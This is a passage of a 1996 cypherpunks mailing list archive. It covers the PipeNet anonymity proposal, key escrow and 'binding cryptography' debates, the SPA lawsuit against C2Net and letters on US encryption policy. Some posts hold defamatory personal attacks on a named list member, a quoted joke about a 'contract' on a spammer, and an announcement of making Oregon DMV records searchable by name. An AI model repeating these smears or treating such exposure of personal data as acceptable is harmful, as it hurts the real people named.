donate a T1. They will expect compensation. Perhaps via Ecash. The new 
Ecashlib should do the job just fine. <http://www.digicash.com/api/>

> If someone were to set up a real-time BlackNet it could provide a superset
> of Decense and also offer considerably improved anonymity.  I've heard some
> months ago that such a project is under consideration.
That would be nice.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 14 Oct 1996 22:59:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [Repost] PipeNet
Message-ID: <Pine.3.89.9610142215.A10086-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


Below is a repost of the original PipeNet article from February, 1995. 
The author is Wei Dai.

-----BEGIN PGP SIGNED MESSAGE-----

A week ago I made a suggestion for a new protocol for untracibility,
but only got one response.  I'll try again, this time more
forcefully.  I'm not trying to convince anyone to implement this
(though of course you're welcome to!), but just to think about it and
give me feedback.

Why is another protocol needed?  Right now we have only two,
each of which has its own set of tradeoffs.  To summarize:

        Mix-Net (i.e., remailer-net): high latency, moderate bandwidth
                costs, and low complexity
        DC-Net: moderate latency, high bandwidth costs, and high complexity

While the DC-Net will probably never be widely used, the remailer-net
has a fair chance of one day
providing a way for many people to send e-mail that not even governments
can trace.  However, I don't think this is enough.  Efficient
social and business relationships require that people be able to
converse to each other in real time.  Cryptoanarchy will not come about
if people cannot do this anonymously.  How well can two pseudonymous
agents negotiate a contract if each message they send must be delayed
several hours?  The protocol I sugguested would have low latency, moderate
bandwidth costs, and moderate complexity.  It would be well suited for
people to interact anonymously in a textual environment.

This is what I wrote:
> Imagine a server that allows you to open a
> low bandwidth (let's say around 100 cps, in order to reduce costs)
> link-encrypted telnet session with it, and provides you with a number
> of services, for example a link-encrypted talk session with another
> user.  You'll need to maintain the link 24 hours a day to defend
> against statistical analysis, and of course you can chain a number of
> these servers together in a way similiar to chaining remailers.

Lance pointed out the chain cannot be built quickly.  This is not a problem
if servers connect to each other with relatively wide link-encrypted pipes
and multiplex your connection into these pipes.

In this system, latency would never be more than a few seconds, bandwidth
cost is N*100 cps (point to point), N being the number of links in your 
chain.
Implementation would probably be harder than remailers, but much easier
than DC-Nets.  The protocol would also provide both sender and receiver
untracibility without any need for broadcasting.

Wei Dai

P.S. I never gave a name for the protocol... let's call it Pipe-net.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzgewDl0sXKgdnV5AQGzvAQAgFaOxOzFPgS031z4jZRYUJp/+3BS5Con
Kza7WsvZPvxzaNLh9ecD3aCx5dtf4muaiUKjC2HIItaLKEdZZPdzUGFd4wg1cY8G
k8mvYNzDImr3ZtQ0HiqQ59PWhznad0GuhjQajB7RtpI+K/Z4uBaUEZGVoZZT+LHN
MSjOl/k/yfg=
=jgq6
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Mon, 14 Oct 1996 15:19:24 -0700 (PDT)
To: "'Ulf Moeller'" <um@c2.net>
Subject: RE: binding cryptography
Message-ID: <01BBBA25.B6CD8860@port13.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


Ulf Moeller[SMTP:um@c2.net] wrote:
>:   liberal (Japan) to non-liberal (France). We believe that "binding
>:   cryptography" is flexible enough to achieve this: a liberal crypto
>:   policy might use no Trusted Retrieval Parties at all, while a very
>:   non-liberal country might want one (government controlled) TRP, a
>:   compliance check on all network traffic and a ban on other crypto.
>
>I doubt that even French internet providers would want their routers
>to perform six modolo exponetiations and four modolo divisions
>whenever someone opens a secure socket...

They could, however, take random checks which could also be
performed off-line (after the connection was established or even already finished again). Remember we called it fraud-*detecting* not fraud-*preventing*.
BTW, some people on the cypherpunks list seem to think that you can't fraude with a *voluntary* system. However, that is possible: when you do not comply with the *agreed* rules of conduct then the phrase "fraude" is appropriate. The same holds, for instance, when you make copies of microsoft word and resell them. Then you don't comply to the rules that you voluntarily agreed to when buying it...

>   We offered a solution for the *first* task not for the *second*; the
>   point is that criminals(!) do not gain any real advantage from using
>   the system in that way as they - among other things - still face the
>   key-management problem. The above dicussions are only relevant in
>   countries where the use of crypto outside the structure would be
>   prohibited.
>
>Of course, criminals do get real advantage from this system. They can
>use strong encryption for their messages and super-encrypt them using
>"binding" cryptography. So their illegal messages look perfectly
>inconnous as long as their government trusts in the "binding" property
>of this scheme. Only when the GAK key holder tries to decrypt a
>message, they notice that they cannot read it.
I agree, that is inevitable.
>
>Can you imagine that anyone would ever create a program that tries to
>look like a conforming implementation, but generates invalid "binding"
>data -- when it is so much easier to simply use PGP, and (if
>necessary) disguise that fact using the government-approved encryption
>software?  I don't, so in my opinion the verification process is
>abolutely useless.
Can you imagine what would happen if governments would (help to) set up a system that has no safeguards at all, i.e.  that could give criminals all the anonimity and confidentiality they need? Governments can't probably prevent criminals and the like to use encryption to stay out of sight of law enforcement agencies, but they should not facilitate them either. In the next few years all kinds of "standard" commerical software will come on the market with all kinds of standard security in it. I don't want criminals to be happy with Custom of The Shelf products for security, let them work for their security.

One might say, binding cryptography, like several
>other cryptographic protocols, is a nice 'solution', but one with no
>corresponding 'problem' in the real world. :)  It doesn't help in
>legitimate law enforcement, but it causes trouble to network operators
>and it deprives law-abiding citizens of their privacy.
We have set up the TRPs in such a flexible way that anybody could find one he can trust, one might even set up his own TRP. Also in the paper we describe how two or more TRPs could be used. Maybe some countries don't want TRP at all. The bottom line is that law-abiding citizens always have to give up some of their freedom to stop criminals (that is why you have to have registration plates on your car, a lock on your car, bicycle, house etc.). That is a fact of life; one I hate. So the point is: where is the middle of giving up freedom and stopping criminals? Well, I think that our concept gives a flexible way of implementing any national middle.. I agree with some of the poster to cypherpunks that governments involves the general public too less in the determination of this middle (some posters said it more strongly). Cryptopolicy is not a binary discussion; although some posters on this list seem to think so.

>And criminals don't face "the key-management problem". In any GAK
>scheme, the official keys can be used to certify other un-escrowed
>encryption keys. Binding cryptography makes it just a little easier,
>because there is no need to create any "illegal" key pairs. Everyone
>can encrypt messages using the government-certified ElGamal keys,
>and then repeat that process, this time including the data required
>for goverment access.
>   that use of other systems will always be possible. Also, the above
>   discussions already showed that if such a system is voluntary, then
>   there are lots of way to go around it.
>
>Criminals will always find ways around these systems -- even if they are
>mandatory. Just those who actually "have nothing to fear", will not
>go in the risk to use illegal encryption. So governments can wiretap
>law-abiding citizens, but not criminals. What useful is a system like
>that?
>
You are absolutely right. However, as said above if governments (help to) set up a security system then they should at least attempt to make criminal abuse difficult. The lock on my bicycle is not really 100% either (as I found out quite to often); if I'd no lock at all I would have a lot more problems. Also, I am *not* for a mandatory system.


Best regards, Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 14 Oct 1996 21:28:29 -0700 (PDT)
To: Hal Finney <hal@rain.org>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610140530.WAA17735@crypt>
Message-ID: <199610150443.XAA31966@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610140530.WAA17735@crypt>, on 10/13/96 at 10:30 PM,
   Hal Finney <hal@rain.org> said:

>The "blinded identities" problem is one of the oldest that we have
>discussed here (although not much recently, of course!).  It is basically similar to
>what cryptographers call "blinded credentials" and is closely related to electronic
>cash, as Michael Froomkin's example from Stefan
>Brands points out.  I posted an idea a few years ago for how to use the technique to
>solve the related problem of remailer abuse.

>A simple way to approximate what you want is to use a standard blinded
>signature exactly as is done with David Chaum's DigiCash.  The customer comes to you
>and presents some proof of identity.  This may be in
>person via standard paper documents, or on-line via some cryptographic
>credential as you suggested.  You make a list of all of your customers, and make
>sure that this customer is new, someone you haven't seen before.

Hmmmm... I am at a loss as why the customers identity needs to be know at all?

What does it matter if I am a new customer or not?

I don't see why we couldn't have anonymous prepaid credit-cards similiar to the prepaid calling cards available now. You pop down to the local bank here's $500 cash, they give you your card, when you have used up your $500 you throw it away. Of cource the issuer of the card would charge some fee for the service, say $1 on every $100, maybe more maybe less the market will decide that. :)  

No one need know who I am or what I am purchasing. Much simpler to implement, no id verification, no blinded credentials, Just treat it like any other credit card.

KISS - Keep It Simple Stupid :)


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Windows: Just another pane in the glass.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Oct 1996 02:01:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
Message-ID: <199610150901.CAA12454@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 10/14/96 -0700, Steven L Baur <steve@miranova.com> wrote:
>	http://www.spa.org/piracy/CODE.htm
>    ...
>    8. Do not sponsor, endorse, or advertise access to infringing
>       software.

I wonder how a "Hack Netscape" or "Hack Microsoft" contest fits in with this,
to name two major public services run by C2......

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Tue, 15 Oct 1996 02:13:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Oregon DMV database online once again...
Message-ID: <2.2.32.19961015091137.006dbb94@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


       
The Oregon DMV database will once again be searchable on the web, in
a few days, at http://www.notek.com/or-dmv.  Suggestions on what
sorts of privacy-related propaganda should be on the page are welcome
(and encouraged: currently there's really nothing there...)  Also, 
looking for a volunteer to write a quick press release we can
send to Oregon media, regarding the reasons behind the page, etc. (I
suck at such things, and would prefer if someone else with a talent
for writing on cypherpunk-type topics would do it.)

A few details, for those who want to know:  the actual databases are 
stored on a 486DX/33 (the only machine I could spare for the task..)
running linux 2.0.13 with 8 megs o' RAM.  The search isn't quite as
speedy as Genocide2600's (the previous home of the Web-Searchable dmv 
database), but it's reasonably fast.  The license database is indexed 
on last name, the plates database is currently indexed on plate number, 
but when I can find more harddrive space, it will also be indexed (and 
thus searchable) by last name, which is a bit of an expansion on Genocide
2600.

Anyway, all that's really left is a few hours of work tidying up 
the cgi/database server code and finishing the actual web page, 
which I should get to tomorrow or possibly the next day.  I'll post
a notice when the page is officially up, but in the meantime, please
let me know what type of privacy propaganda/tools/info (if any) would be 
appropriate.  Thanks...

//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuele Landi <slandi@ats.it>
Date: Mon, 14 Oct 1996 17:34:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: News_dal_Ragno_Italiano.
Message-ID: <199610150036.CAA29330@ats.it>
MIME-Version: 1.0
Content-Type: text/plain



Questo e' un messaggio informativo automatico per un 
servizio gratuito di pubblico interesse.
Viene spedito una sola volta per lo stesso indirizzo
e-mail anche se sono presenti piu' pagine.

Il "Ragno Italiano" e' lieto di comunicarle che le pagine
da lei pubblicate sul WWW sono state catalogate nel nostro
motore di ricerca.
Saranno visibili a indicizzazione completata di di tutti
i siti italiani prevista per il 30/10/96.

Il "Ragno Italiano" e' il motore di ricerca per l'italia
con oltre 500.000 pagine catalogate e ricercabili subito
all'indirizzo:
http://ragno.ats.it

--------------------------------------------------------
Sponsor permanente: 

http://www.webspace.it  
======================
50 mb di spazio WWW con dominio proprietario 
(www.nome_azienda.it/.com) 
per 150.000 Lire al mese
--------------------------------------------------------


Il "Ragno Italiano" e' motore di ricerca anche per:

- Indirizzi e-mail in Italia
- Newsgroups Italiani
- Meta-Interfaccia per tutti i maggiori motori di ricerca
  mondiali

Cordiali Saluti.

Samuele Landi -  WebMaster ragno.ats.it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 14 Oct 1996 20:23:14 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Fuck Cyberpromo
In-Reply-To: <Pine.SUN.3.91.961014162411.22818G-100000@beast.brainlink.com>
Message-ID: <Pine.LNX.3.94.961015032040.967A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, Ray Arachelian wrote:

> On Sun, 13 Oct 1996, Roy M. Silvernail wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > In list.cypherpunks, richieb@teleport.com writes:
> > 
> > > At 11:07 AM 10/13/96 CST, roy@scytale.com wrote:
> > > [snip]
> > >
> > >>Anyone on the list know of a good, heavy-handed collection agency that
> > >>would like to take this when it tops, say, $500?
> > >
> > > Why not just filter the shit?
> > 
> > Can't filter until the traffic is delivered to the local system here.
> > By that time, I've already paid for its delivery.  Wallace and
> > CyberPromo are costing me real, measurable money, and I want it stopped.
> > 
> > Besides, it will be a valuable precedent if I can collect (or even
> > obtain a judgement).  This is right in line with the junk fax law, which
> > recognized that junk faxes consume the receiver's resources without
> > permission or compensation.
> 
> I'd like to join you on this.  I have sent email to 
> wallace@asswipespamnet already as well as left them voice mail for every 
> message they sent, they will be charged $500 per message and the next one 
> I receive constitutes acceptance.  I've since then recieved about 4-5 
> more, which means they owe me $2000 or thereabouts. :)
> 
> So what steps do we need in putting some teeth into this?
> 

Hrmm.. as far as I know verbal agreement (i.e. verbal contract in the
future tense -- "I will charge you") is only valid up to $500 TOTAL.

but as long as thats the total, you'll probably piss them off enough
anyway. ;)

 --Deviant
When we write programs that "learn", it turns out we do and they don't.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Tue, 15 Oct 1996 00:44:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Sameer should sue the SPA
Message-ID: <199610150743.DAA06174@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Let's see, what can Sameer sue the SPA for...

1) Filing a frivilous lawsuit, of course.

2) Extortion.  "Sign this or we'll sue."

3) Libel and Defamation.  "SPA's false statements about Mr. Parekh have
   harmed his reputation as a software publisher, and cost him profits..."

4) Conspiracy to violate the ECPA by demanding logs and records which may
   contain private/confidential information.  (Dunno about this one, but
   it's worth a shot.)

5) Anything else?  How much $ in damages do you think he can get?



Also, SPA is going after C2 because one of their customers allegedly
had a link to a pirate site - but they have (apparently) not gone after
the pirate site itself!  Could someone explain to me how there can be a
finding of contributory copyright infringement, when there is no direct
copyright infringement?

Fonovisa v. Cherry Auction is an often-cited case here.  In this case,
a lawsuit was brought against the swap meet operators only after action
had been taken against the vendors of the illegally copied material.
It does not seem logical that c2 could be liable for contributory
infringement when no actual infringement has (yet) been shown to exist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 14 Oct 1996 20:49:48 -0700 (PDT)
To: sameer@c2.net
Subject: Re: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
In-Reply-To: <199610141821.LAA28792@atropos.c2.org>
Message-ID: <199610150347.FAA21621@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The SPA allegedly send sameer@c2.net a letter, demanding, among other things,
that he "agree to implement monitoring procedures to prevent similar acts
of copyright infringement and report those procedures to SPA."  Under federal
law (Electronic Communications Privacy Act) it is illegal to monitor users'
actions unless there is a specific contract between the service provider to
allow such monitoring, or a court of law has issued a valid search warrant.

If the SPA did in fact send such a letter, what they are doing is illegal.
They have alleged that a copyright violation has occured.  If that were true
and they had evidence to support that claim, then under federal law, they
could have asked a judge to issue a search warrant to seize the infringing
material and stop its distrubution, and/or they could have subpoenaed
information about the alleged infringers from C2NET.  But, because they did
not have any evidence of a copyright violation, they could not get a search
warrant.  Consequently, they have attempted an illegal search, in violation
of the ECPA.  They threatened the CEO of C2NET with legal action if he did
not assist them with their unlawful scheme.  He rightfully refused, and
now they are carrying out their threatened harassment against him.

The lawsuit filed by SPA mentions no specific cases of copyright
infringement, because, in all likelihood, there never were any.  The SPA
is merely going on a fishing expedition.  The SPA should not be suing
Sameer - Sameer and his users should be suing the SPA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 15 Oct 1996 05:09:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Threats from FOTM (Friends of Timmy May)
In-Reply-To: <Pine.3.89.9610150547.A858-0100000@skypoint-gw.globelle.com>
Message-ID: <Vi7TVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been receiving multiples copies of threats of frivolous lawsuits in
connection with Sandy Sanford's kind offer to address the San Francisco
Gay and Lesbian Cypherpunks Meeting (and Meating). Therefore I'm regrettably
forced to postpone taking advantage of said kind offer until Timmy May is
actually indicted for possession of controlled substances (to wit, Ritalin)
and/or sexually molesting two feline minors and/or practicing cryptography
without a licence. (Given Timmy May's total ignorance of cryptography, I
find the latter to be the least likely.) Hope to see you all then,
                                                            Dimitri

]Date: Tue, 15 Oct 1996 06:04:16 -0500
]From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
]Subject: Abuse from Dimitri Vulis
]To: root@bwalk.dm.com, postmaster@bwalk.dm.com
]Message-Id: <Pine.3.89.9610150547.A858-0100000@skypoint-gw.globelle.com>
]Mime-Version: 1.0
]Content-Type: TEXT/PLAIN; charset=US-ASCII
]
]Attached is a tiny example of the type of uncalled-for slander that Mr.
]Dimitri Vulis has been sending unsolicited to a list of subscribers to a
]cryptography forum.
]
]You are hereby notified of this illegal activity by one of your subscribers.
]If you fail to take corrective measures, the Boardwalk Brighton Beach
]BBS and its sysops may be named in a civil lawsuit.
]
]---------- Forwarded message ----------
]Date: Thu, 10 Oct 96 21:51:57 EDT
]From: Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
]To: cypherpunks@toad.com
]Subject: Re: LET'S MEET DIMITRI
]
]Sandy Sandfort <sandfort@crl.com> writes:
]> his choice of topic, of course.
]
]"Timmy May and his sexual perversions". Illustrated with slides.
]
]---
]
]Dr.Dimitri Vulis KOTM
]Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 15 Oct 1996 05:10:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: WOW!
In-Reply-To: <Pine.SUN.3.91.961014195648.7904A-100000@crl5.crl.com>
Message-ID: <NN7TVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> Now there's only one thing missing--Dimitri's response.

I already responded more times than this threat warranted.

Note that I've received threats of frivolous lawsuits in
connection with your offer, as I just pointed out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 15 Oct 1996 05:09:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Killing Mr. Wallace of "Savetrees"?
In-Reply-To: <v03007800ae88ce3644c9@[207.167.93.63]>
Message-ID: <TP7TVD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> It looks like Jim Bell is arranging a contract on Mr. Wallace (apparently
> the operator of "abusebot@savetrees.com," and other obnoxious spambots
> assocated with Cyberpromo).

Where can I bet that Mr. Wallace *won't* shut up?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Oct 1996 04:51:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PINmail in the SCMP
Message-ID: <v03007809ae892001c602@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


From: somebody
Date: Tue, 15 Oct 1996 15:13:07 +0800
To: rah@shipwright.com
Subject: PINmail in the SCMP
MIME-version: 1.0 (Created by TFS)

Front page of the Technology Post section of the 15/10/96 edition
of the South China Morning Post, next to a cheesy photo of the two
men quoted in the article looking (peering?) through venetian blinds.

Headline: Anonymous e-mail site launched.

Byline: Keala Francis

Highlights:

"Hong Kong advertising agency Momentum has created an anonymous
e-mail service for Internet users around the world."

penet closed down "because it was perceived to be condoning child
pornography. [Director] Tobin said PINmail (http://www.PINmail.com)
was designed as an offshore address only for legitimate businesses,
but the compay could not necessarily control its users."

Tobin: "If there is proof of illegal activities, I would give up a
name."

"Momentum created and owns shares in AsiaFocus International, which
owns PINmail."

Access via Netscape 3.0. IExplorer due before December. (Uses CGI and
Javascript in a way that is incompatible with IE3.0.)

Daley (Momentum GM): "There are really no disadvantages to having
your e-mail sit on a server rather than your PC."

"PINmail can also allow you to maintain an anonymous address."

"Momentum has set up three server sites in Hong Kong, California and
Amsterdam to enable easier and more efficient access."

PINmail = USD19.95/yr.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 15 Oct 1996 06:01:45 -0700 (PDT)
To: everheul@NGI.NL (Eric Verheul)
Subject: Re: binding cryptography
In-Reply-To: <01BBBA25.B6CD8860@port13.ztm.pstn.rijnhaave.net>
Message-ID: <961015.070923.9P3.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, everheul@NGI.NL writes:

> BTW, some people on the cypherpunks list seem to think that you can't =
> fraude with a *voluntary* system. However, that is possible: when you do =
> not comply with the *agreed* rules of conduct then the phrase "fraude" =
> is appropriate.

If the system is *voluntary* and I do not *agree* to participate, then I
*cannot* be breaking any "rules".

> Can you imagine what would happen if governments would (help to) set up =
> a system that has no safeguards at all, i.e.  that could give criminals =
> all the anonimity and confidentiality they need? Governments can't =
> probably prevent criminals and the like to use encryption to stay out of =
> sight of law enforcement agencies, but they should not facilitate them =
> either. In the next few years all kinds of "standard" commerical =
> software will come on the market with all kinds of standard security in =
> it. I don't want criminals to be happy with Custom of The Shelf products =
> for security, let them work for their security.

Which they will, and presumably already do.  Therefore, your proposal
does not and cannot hamper criminals.  Therefore, your proposal only
hampers law abiding citizen-units' access to uncompromised crypto.

No institution can expect compliance from a sector of society that,
by definition, does not agree to or follow the social contract.
Therefore, any and all such attempts to do so must be for the purpose of
controlling those citizen-units that do abide the social contract.  To
claim otherwise is absurd.

> The bottom line is that law-abiding citizens =
> always have to give up some of their freedom to stop criminals (that is =
> why you have to have registration plates on your car, a lock on your =
> car, bicycle, house etc.). That is a fact of life; one I hate.

Registration plates do not "stop criminals".  Locks do not "stop
criminals" (although they might slow a criminal down).  Neither will
compromised crypto "stop criminals".  But all the above impinge on my
liberty.  Am I to give up yet another freedom?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmOCMBvikii9febJAQESvQQAk9SzgWf0ZB7pCtmH9MKmJk/DS21efDn8
1X5H2etWhNmfJ6QIg8IaMTElzBk98GxUG7qQSFsWdkZ28NAbURBATk9dYwWwM+Gf
/oyrzqCRZ/MxCV6RfDGQMc9BvznCl85yj35vCaFMcLs4yNokBBgsDbtz9mgi53pR
gYMgOwhVEQs=
=Pgp0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Oct 1996 04:20:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GAK Naive or Shrewd?
Message-ID: <1.5.4.16.19961015111823.2a6f2372@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


     Ern Hua's letter is ultimate.

     -----

     The New York Times, October 15, 1996.


     Is Clinton's Encryption Policy Naive or Shrewd?


     To the Editor:

     There is something strange going on with the Clinton
     Administration's policy on data-scrambling software and
     Secretary of Commerce Mickey Kantor's defense of it
     (letter, Oct. 11).

     If the Administration really wanted to prevent encryption
     software from falling into hostile hands, it would try to
     pass a law limiting the type of encryption that can be
     sold domestically, not just exported.

     The cumbersome system the Administration proposes may be
     a measure of its computer naivete. People who are
     familiar with computer encryption know that strong
     encryption can be readily had here in the United States
     over the Internet or telephone lines from dial-up
     computer bulletin boards.

     Not long ago I downloaded a copy "Pretty Good Privacy," a
     system similar to the Rivest-Shamir-Adelman "strong"
     public-key method. Anyone with a computer, a modem and a
     phone line could do the same.

     Or the Government may not be naive at all but merely
     Machiavelian. Suppose the code breakers at the National
     Security Agency had managed to develop efficient
     solutions to "strong" methods. Would it be in the
     Government's interest to keep that fact a secret and to
     create a distracting furor by pushing another, weaker
     (and exportable) encryption system it knows has not a
     chance being adopted? Then encryption usrs would be
     lulled into using compromised systems while the National
     Security Agency decrypts their mail.

     Warren Wetmore,Hazel Crest, Ill., Oct. 11,1996

     -----

     To the Editor:

     Mickey Kantor's Oct. 11 letter is unconvincing. Instead
     of trying to prohibit strong cryptography, governments
     should encourage its use. It is the best tool for
     defending our privacy on the information highway.

     Jeffrey Shallit, Kitchener, Canada, Oct. 11,1996
     The writer is an associate professor of computer science
     at the University of Waterloo.

     -----

     To the Editor:

     Mickey Kantor (letter, Oct. 11) says that your Oct. 4
     editorial ignores the trend -- especially in Europe -- to
     require use of key-recovery products and bar the import
     of stronger encryption products. This ignores that no one
     wants mandated key recovery. Some important uses of
     encryption, like secure telephone conversations, do not
     need key recovery for any reason other than law
     enforcement intercepts.

     Mr. Kantor's point on other nations' barring imports is
     absurd. Since when do we tailor our export limits to the
     import limits of other nations?

     The "trend" Mr. Kantor refers to is artificially created
     by the United States through lobbying efforts. Mr. Kantor
     uses the word "trend" as if other nations were
     independently pursuing the key-recovery path, when, in
     fact, only a few are considering such a move. Some, like
     Japan, have opposed such a direction. Others, like
     Sweden, have considered such a move secretly because such
     a policy cannot withstand democratic scrutiny.

     Mr. Kantor's letter is a blatant attempt by the
     Administration to get what it wants for law enforcement
     and national security agencies without any concern for
     the nature of the technology or the economic effect of
     such policies.

     Ernest Hua, Sunnyvale, Calif., Oct. 11, 1996
     The writer is a software engineer.

     -----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 15 Oct 1996 07:25:03 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: WOW!
In-Reply-To: <NN7TVD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961015070035.26069F-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 15 Oct 1996, Dimitri wrote:

> I already responded more times than this threat warranted

I'm totally nonplused.  Does anyone on the list have any idea 
what Dimitri is talking about?  Has he posted a RESPONSIVE answer
to my invitation?  If so, I never saw it.  

Does anyone have any idea why Dimitri uses the term "threat"?  I 
have not threatened Dimitri and I have indicated that as my guest 
he will be under the mantle of my protection.  He'll be safer here 
than he is in his own bed.

> Note that I've received threats of frivolous lawsuits in
> connection with your offer, as I just pointed out.

Assuming /arguendo/ that such threats have been made, I hereby
request that anyone making such threats desist.  I further pledge
that I will personally hire a lawyer to defend Dimitri if any 
such suit is brought in California.  (If someone wants to sue
Dimitri in New York, now or later, that'll be his problem.)


 S a n d y

	"Cowards die many times before their deaths;  
	The valiant never taste of death but once."
	    --William Shakespear, /Julius Caesar/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 15 Oct 1996 07:54:29 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: "Threats"
In-Reply-To: <Vi7TVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961015072559.26069H-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Ah, now we're getting somewhere.

